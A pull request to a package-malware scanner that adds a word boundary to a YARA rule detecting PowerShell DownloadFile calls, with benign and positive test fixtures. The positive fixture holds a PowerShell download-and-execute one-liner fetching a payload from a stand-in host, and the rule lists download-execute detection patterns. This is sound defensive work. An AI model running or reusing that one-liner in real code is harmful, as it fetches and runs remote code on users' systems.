### PR TITLE
fix(rules): require word boundary for PowerShell DownloadFile pattern

### DIFF
--- a/guarddog/analyzer/sourcecode/threat-process-download-exec.yar
+++ b/guarddog/analyzer/sourcecode/threat-process-download-exec.yar
@@ -74,7 +74,8 @@ rule threat_process_download_exec
         // PowerShell download patterns
         $ps_download = /powershell.*curl\.exe/ nocase
         $ps_iwr = /Invoke-WebRequest/ nocase
-        $ps_downloadfile = /DownloadFile\s*\(/ nocase
+        // word boundary avoids matching substrings like a JS `ondownloadfile(` handler
+        $ps_downloadfile = /\bDownloadFile\s*\(/ nocase
 
     condition:
         // Direct download-execute patterns (high-signal strings only)

--- a/tests/analyzer/sourcecode/benign/threat-process-download-exec.js
+++ b/tests/analyzer/sourcecode/benign/threat-process-download-exec.js
@@ -5,3 +5,11 @@ function trackRequest(requestId, input) {
   const match = urlRegex.exec(input);
   return { info, match };
 }
+
+// Legit: a bridge/adapter event-handler setter named `ondownloadfile`, not
+// a PowerShell file-transfer method call. Must NOT trip download-exec.
+class Bridge {
+  set ondownloadfile(handler) {
+    this._onDownloadFile = handler;
+  }
+}

--- a/tests/analyzer/sourcecode/threat-process-download-exec.js
+++ b/tests/analyzer/sourcecode/threat-process-download-exec.js
@@ -1,0 +1,4 @@
+// Positive test for threat-process-download-exec.
+// A PowerShell WebClient download-and-execute one-liner embedded in a
+// spawned command string.
+child_process.exec('powershell -Command "(New-Object Net.WebClient).DownloadFile(\'http://evil.test/payload.exe\',\'payload.exe\')"');


### PR DESCRIPTION
Fixes #869

## Root cause

`threat-process-download-exec`'s `$ps_downloadfile` pattern (`/DownloadFile\s*\(/ nocase`) had no left-hand boundary, so it matched as a bare substring inside unrelated identifiers.

Reproduced directly against the real package from the report: `pi-mcp-adapter@2.26.1`'s `app-bridge.bundle.js` contains a minified property setter `set ondownloadfile(r){...}` (a bridge/adapter event-handler registration, unrelated to file transfer). The pattern matched purely on the substring `downloadfile(` inside that identifier - there is no PowerShell or `WebClient` context anywhere in the file.

## Fix

Add a word boundary, consistent with this rule file's other patterns and the word-boundary convention documented in `WRITING_RULES.md`:

```
$ps_downloadfile = /\bDownloadFile\s*\(/ nocase
```

This still matches the real attack shape (e.g. `(New-Object Net.WebClient).DownloadFile(...)`, where the preceding character is `.`, a non-word character, so the boundary holds), while no longer matching inside a longer identifier where the preceding character is a letter.

## Verification

- Downloaded the real `pi-mcp-adapter@2.26.1` npm package and confirmed via direct `yara-python` compile+match that the rule fires on the unmodified rule (red) and does not fire after the fix (green).
- Added `tests/analyzer/sourcecode/threat-process-download-exec.js` positive test locking in that a real PowerShell `WebClient` download-and-execute one-liner embedded in a spawned command is still detected.
- Appended a case to the existing `tests/analyzer/sourcecode/benign/threat-process-download-exec.js` benign fixture locking in the exact `ondownloadfile` false-positive shape.
- Full sourcecode YARA suite passes: 132/132 relevant tests (`uv run pytest tests/analyzer/sourcecode`). Two unrelated pre-existing fixtures for a different rule get quarantined by Windows Defender on this dev machine since they intentionally mimic malicious code for other rules' tests - confirmed via `Get-MpThreatDetection`, unrelated to this change and not part of this diff.

This is a companion fix to #871, which addresses the same left-hand-boundary issue class in the JS `eval` obfuscation rules (also found via this same report cycle).